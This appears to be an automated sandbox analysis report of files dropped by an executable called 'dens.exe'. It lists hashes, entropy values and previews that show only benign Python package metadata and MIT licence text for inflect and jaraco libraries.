                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):21079
                                                                                                                                                                                                                                            Entropy (8bit):5.103530371859935
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:384:12Vpnu38/2K9tjUaNtT/yTCtYTnWDdg3GaXb51KLVgWTVPeEGsuPrAESM:12Vpnu38JZtT/yIdg3D51KLV7RPeEGs+
                                                                                                                                                                                                                                            MD5:1A287FAF08B125BC7C932AAD05E7DAEE
                                                                                                                                                                                                                                            SHA1:C37042ADC0D1270485F4B8B5B9E085A274DC035B
                                                                                                                                                                                                                                            SHA-256:66030D634580651B3E53CC19895D9231F8D22AA06B327817C8332CFC20303308
                                                                                                                                                                                                                                            SHA-512:D0BB0AD27A17007DF7D3281FB2F46EFB048B69532D082AB1D431E0BA28E592D897687708B4EC972F4BC21EDA29DDDDC9EF44BB950DFC4FFB03EA75CDA4DE414C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: inflect.Version: 7.3.1.Summary: Correctly generate plurals, singular nouns, ordinals, indefinite articles.Author-email: Paul Dyson <pwdyson@yahoo.com>.Maintainer-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Source, https://github.com/jaraco/inflect.Keywords: plural,inflect,participle.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Classifier: Natural Language :: English.Classifier: Operating System :: OS Independent.Classifier: Topic :: Software Development :: Libraries :: Python Modules.Classifier: Topic :: Text Processing :: Linguistic.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools >=8.5.0.Requires-Dist: typeguard >=4.0.1.Requires-Dist: typing-extensions ; python_version < "3.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):943
                                                                                                                                                                                                                                            Entropy (8bit):5.828988691860191
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:IVn/2zDPvbqfuIpBntmuIcjlM+sVGXdbkDcnJopDvDK16bZWJV:unuXPzUuIpRtmuZjl9sVQgcnJo9bK16E
                                                                                                                                                                                                                                            MD5:C837BB3258448B7FCC6B77559C7F17B6
                                                                                                                                                                                                                                            SHA1:B15701449CD64A13756A70AD3704E26DB1FF416B
                                                                                                                                                                                                                                            SHA-256:5D7834AC1BA2612C6801050FDE57A7B98B0F36ACF88C3C2D4F376FD8911B3091
                                                                                                                                                                                                                                            SHA-512:2333CD86502C51607414390ECF43BD6D62E863D3DFB0501DAD3A8B45F5F4DFA81F910917183FC4F4A0DEEC82C8F8B3CF8D5B0A2C136DEB164226BABE68B74A33
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:inflect-7.3.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..inflect-7.3.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..inflect-7.3.1.dist-info/METADATA,sha256=ZgMNY0WAZRs-U8wZiV2SMfjSKqBrMngXyDMs_CAwMwg,21079..inflect-7.3.1.dist-info/RECORD,,..inflect-7.3.1.dist-info/WHEEL,sha256=y4mX-SOX4fYIkonsAGA5N0Oy-8_gI4FXw5HNI1xqvWg,91..inflect-7.3.1.dist-info/top_level.txt,sha256=m52ujdp10CqT6jh1XQxZT6kEntcnv-7Tl7UiGNTzWZA,8..inflect/__init__.py,sha256=Jxy1HJXZiZ85kHeLAhkmvz6EMTdFqBe-duvt34R6IOc,103796..inflect/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__init__.py,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..inflect/compat/__pycache__/__init__.cpython-312.pyc,,..inflect/compat/__pycache__/py38.cpython-312.pyc,,..inflect/compat/py38.py,sha256=oObVfVnWX9_OpnOuEJn1mFbJxVhwyR5epbiTNXDDaso,160..inflect/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):91
                                                                                                                                                                                                                                            Entropy (8bit):4.7098485981676825
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeXMRYFAVLKSgP+tPCCfA5S:RtC1VLKZWBBf
                                                                                                                                                                                                                                            MD5:EB46A94D39AC40E2EEA4A32729E0C8C3
                                                                                                                                                                                                                                            SHA1:E42EF49A7098269E1934932ECC3174B40967982A
                                                                                                                                                                                                                                            SHA-256:CB8997F92397E1F6089289EC0060393743B2FBCFE0238157C391CD235C6ABD68
                                                                                                                                                                                                                                            SHA-512:D89F0DA16AA37AAFAC0DE56A3DFBD72DC3C9DCC53C8E455094E7230DB21ABF95ED76EAC1848A4156DB422B9C10BE136201D871DCCB73AD38192E5536E41DBDFE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: setuptools (70.2.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8
                                                                                                                                                                                                                                            Entropy (8bit):3.0
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:KDpJ:K9J
                                                                                                                                                                                                                                            MD5:4571281D24750CBE7638EFE250E342AB
                                                                                                                                                                                                                                            SHA1:61E8A0AD5796F1CA67EAB0D8108A6402483D499B
                                                                                                                                                                                                                                            SHA-256:9B9DAE8DDA75D02A93EA38755D0C594FA9049ED727BFEED397B52218D4F35990
                                                                                                                                                                                                                                            SHA-512:E7807002E53CC228D6EFB307E928C6737796B29E31D25A342ED407F556FFBF540494FE92C27B5C31043D2D7FF427C78A29C4FF5595BC11BB643003026642254E
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:inflect.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (406)
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4020
                                                                                                                                                                                                                                            Entropy (8bit):4.99859161164956
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:D6P4YaCP1gGRbHneRohWYc+f/PCnG9rulJQ84UNxCUSwTcL:kPqGRbHneRohWJ+XPaqylW/USwTcL
                                                                                                                                                                                                                                            MD5:812F27A7C8C748351DC1643D58B6B250
                                                                                                                                                                                                                                            SHA1:AC9C92013B2F0FC65D741B32A9FE4B956DD6EB7D
                                                                                                                                                                                                                                            SHA-256:C43B60B897A3D2D37D8845C252FC44261D9AEF171E21154111A9012D2AFFFED6
                                                                                                                                                                                                                                            SHA-512:CAC62C3682F808D85233B69F1C142B5A0E95E316E4BDCBC6EE253583EC302FA42E635BAB6A837327D8CE5D26C08C8DCD9E45D5CFDD8346B4501C473250D66953
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: jaraco.context.Version: 5.3.0.Summary: Useful decorators and context managers.Home-page: https://github.com/jaraco/jaraco.context.Author: Jason R. Coombs.Author-email: jaraco@jaraco.com.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.License-File: LICENSE.Requires-Dist: backports.tarfile ; python_version < "3.12".Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest !=8.1.1,>=6 ; extra == 'testing'.Requires-Dist: pytest-checkdocs >=2.4
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):641
                                                                                                                                                                                                                                            Entropy (8bit):5.76835538630355
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:TGA0a/2zDJAv/TnqfQlWJAL/fy9vKAGvAXCaaryBAl2VrkEQCXvbAT2r1S:TBn/2zDCvbqfuLO9FGoXamalKSCXzB1S
                                                                                                                                                                                                                                            MD5:2B0A77624AE3903E42C3A8213E593796
                                                                                                                                                                                                                                            SHA1:D63027FF018995D0620E2497BCE9678888A57667
                                                                                                                                                                                                                                            SHA-256:55197B88A78443297BB2D827A75BAAE740B33896251D872835D4B4C75EC2F57E
                                                                                                                                                                                                                                            SHA-512:C02FB1554F8F40158BB60F2B4EC07D80F71CFBFFB38463C5809385A7A2FF8DDB2BDFEFE9AE5E67F4DEC3D904A6E0925E565B0EE6363DD0C2ED5B03A96B056B18
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.context-5.3.0.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.context-5.3.0.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.context-5.3.0.dist-info/METADATA,sha256=xDtguJej0tN9iEXCUvxEJh2a7xceIRVBEakBLSr__tY,4020..jaraco.context-5.3.0.dist-info/RECORD,,..jaraco.context-5.3.0.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.context-5.3.0.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/__pycache__/context.cpython-312.pyc,,..jaraco/context.py,sha256=REoLIxDkO5MfEYowt_WoupNCRoxBS5v7YX2PbW8lIcs,9552..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7
                                                                                                                                                                                                                                            Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                                            MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                                            SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                                            SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                                            SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to.deal in the Software without restriction, including without limitation the.rights to use, copy, modify, merge, publish, distribute, sublicense, and/or.sell copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING.FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEA
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2891
                                                                                                                                                                                                                                            Entropy (8bit):5.034580807599395
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:DEmbsaC3J1x9Ie9okNGwQw8wQw2wTw0zCPU0+I65Jib0H++kv0gM5d0DT+heU04u:DEmgaCZ1nTGDbHRAnzpI6o+fX5dFSwTm
                                                                                                                                                                                                                                            MD5:C2E6BDA7F1B03B39BF42D31B6DBF6C38
                                                                                                                                                                                                                                            SHA1:B7A18F079DE22D10C4C318E54BD8C48177F91333
                                                                                                                                                                                                                                            SHA-256:8B86946900D7FA38DD1102B9C1EBE17A0CB1F09C8B7E29F61F2BDA4A4DC51ECA
                                                                                                                                                                                                                                            SHA-512:F4E892B3D41482E3B17642B1D722B6E2A8E8DD4833F0623C29ED2D50D55CFC68DA1F9756B4E08723DC89F3E552424096C92912AC4DA533FE8E2DC59DC19EA9CF
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Metadata-Version: 2.1.Name: jaraco.functools.Version: 4.0.1.Summary: Functools like those found in stdlib.Author-email: "Jason R. Coombs" <jaraco@jaraco.com>.Project-URL: Homepage, https://github.com/jaraco/jaraco.functools.Classifier: Development Status :: 5 - Production/Stable.Classifier: Intended Audience :: Developers.Classifier: License :: OSI Approved :: MIT License.Classifier: Programming Language :: Python :: 3.Classifier: Programming Language :: Python :: 3 :: Only.Requires-Python: >=3.8.Description-Content-Type: text/x-rst.License-File: LICENSE.Requires-Dist: more-itertools.Provides-Extra: docs.Requires-Dist: sphinx >=3.5 ; extra == 'docs'.Requires-Dist: sphinx <7.2.5 ; extra == 'docs'.Requires-Dist: jaraco.packaging >=9.3 ; extra == 'docs'.Requires-Dist: rst.linker >=1.9 ; extra == 'docs'.Requires-Dist: furo ; extra == 'docs'.Requires-Dist: sphinx-lint ; extra == 'docs'.Requires-Dist: jaraco.tidelift >=1.4 ; extra == 'docs'.Provides-Extra: testing.Requires-Dist: pytest >=6 ;
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:CSV text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):843
                                                                                                                                                                                                                                            Entropy (8bit):5.807846597836061
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:Tmn/2zDRvbqfuggoaGnXamZlKZBX3vpBvt+c0X4yWJV:TmnuXRzUuggDifZlmX/aWJV
                                                                                                                                                                                                                                            MD5:85FB54BAFB143CD57D1787F7EF74FDB2
                                                                                                                                                                                                                                            SHA1:A915BBCDF108A58F3DFC1783D9D4DD3B7F3CE23A
                                                                                                                                                                                                                                            SHA-256:632AA7C04F7C4BCC01C027AF5B9BC76FE8958F4A181035B957A3BD3014BA248B
                                                                                                                                                                                                                                            SHA-512:2A39B4C6F221F88EC61D584C8CD3CAD358E8C7B50E529192105A0A4144ED3C2A4CE8B630C39C18D20E27FE226A23E2DE23CDFF8E3D3693959B165A9A2F9047CD
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.functools-4.0.1.dist-info/INSTALLER,sha256=zuuue4knoyJ-UwPPXg8fezS7VCrXJQrAP7zeNuwvFQg,4..jaraco.functools-4.0.1.dist-info/LICENSE,sha256=htoPAa6uRjSKPD1GUZXcHOzN55956HdppkuNoEsqR0E,1023..jaraco.functools-4.0.1.dist-info/METADATA,sha256=i4aUaQDX-jjdEQK5wevhegyx8JyLfin2HyvaSk3FHso,2891..jaraco.functools-4.0.1.dist-info/RECORD,,..jaraco.functools-4.0.1.dist-info/WHEEL,sha256=GJ7t_kWBFywbagK5eo9IoUwLW6oyOeTKmQ-9iHFVNxQ,92..jaraco.functools-4.0.1.dist-info/top_level.txt,sha256=0JnN3LfXH4LIRfXL-QFOGCJzQWZO3ELx4R1d_louoQM,7..jaraco/functools/__init__.py,sha256=hEAJaS2uSZRuF_JY4CxCHIYh79ZpxaPp9OiHyr9EJ1w,16642..jaraco/functools/__init__.pyi,sha256=gk3dsgHzo5F_U74HzAvpNivFAPCkPJ1b2-yCd62dfnw,3878..jaraco/functools/__pycache__/__init__.cpython-312.pyc,,..jaraco/functools/py.typed,sha256=47DEQpj8HBSa-_TImW-5JCeuQeRkm5NMpJWZG3hSuFU,0..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):92
                                                                                                                                                                                                                                            Entropy (8bit):4.812622295095324
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:RtEeX7MWcSlVlFxP+tPCCfA5S:RtBMwlVTxWBBf
                                                                                                                                                                                                                                            MD5:43136DDE7DD276932F6197BB6D676EF4
                                                                                                                                                                                                                                            SHA1:6B13C105452C519EA0B65AC1A975BD5E19C50122
                                                                                                                                                                                                                                            SHA-256:189EEDFE4581172C1B6A02B97A8F48A14C0B5BAA3239E4CA990FBD8871553714
                                                                                                                                                                                                                                            SHA-512:E7712BA7D36DEB083EBCC3B641AD3E7D19FB071EE64AE3A35AD6A50EE882B20CD2E60CA1319199DF12584FE311A6266EC74F96A3FB67E59F90C7B5909668AEE1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:Wheel-Version: 1.0.Generator: bdist_wheel (0.43.0).Root-Is-Purelib: true.Tag: py3-none-any..
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7
                                                                                                                                                                                                                                            Entropy (8bit):2.5216406363433186
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:GEG0:GEG0
                                                                                                                                                                                                                                            MD5:0BA8D736B7B4AB182687318B0497E61E
                                                                                                                                                                                                                                            SHA1:311BA5FFD098689179F299EF20768EE1A29F586D
                                                                                                                                                                                                                                            SHA-256:D099CDDCB7D71F82C845F5CBF9014E18227341664EDC42F1E11D5DFE5A2EA103
                                                                                                                                                                                                                                            SHA-512:7CCCBB4AFA2FADE40D529482301BEAE152E0C71EE3CC41736EB19E35CFC5EE3B91EF958CF5CA6B7330333B8494FEB6682FD833D5AA16BF4A8F1F721FD859832C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:jaraco.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):4
                                                                                                                                                                                                                                            Entropy (8bit):1.5
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:3:Mn:M
                                                                                                                                                                                                                                            MD5:365C9BFEB7D89244F2CE01C1DE44CB85
                                                                                                                                                                                                                                            SHA1:D7A03141D5D6B1E88B6B59EF08B6681DF212C599
                                                                                                                                                                                                                                            SHA-256:CEEBAE7B8927A3227E5303CF5E0F1F7B34BB542AD7250AC03FBCDE36EC2F1508
                                                                                                                                                                                                                                            SHA-512:D220D322A4053D84130567D626A9F7BB2FB8F0B854DA1621F001826DC61B0ED6D3F91793627E6F0AC2AC27AEA2B986B6A7A63427F05FE004D8A2ADFBDADC13C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:pip.
                                                                                                                                                                                                                                            Process:C:\Users\user\Desktop\dens.exe
                                                                                                                                                                                                                                            File Type:ASCII text
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1023
                                                                                                                                                                                                                                            Entropy (8bit):5.059832621894572
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:OrmJHcwH0MP3gt8Hw1hj9QHOsUv4eOk4/+/m3oqMSFJ:OaJ8YHvEH5QHOs5exm3oEFJ
                                                                                                                                                                                                                                            MD5:141643E11C48898150DAA83802DBC65F
                                                                                                                                                                                                                                            SHA1:0445ED0F69910EEAEE036F09A39A13C6E1F37E12
                                                                                                                                                                                                                                            SHA-256:86DA0F01AEAE46348A3C3D465195DC1CECCDE79F79E87769A64B8DA04B2A4741
                                                                                                                                                                                                                                            SHA-512:EF62311602B466397BAF0B23CACA66114F8838F9E78E1B067787CEB709D09E0530E85A47BBCD4C5A0905B74FDB30DF0CC640910C6CC2E67886E5B18794A3583F
                                                                                                                                                                                                                                            Malicious:false
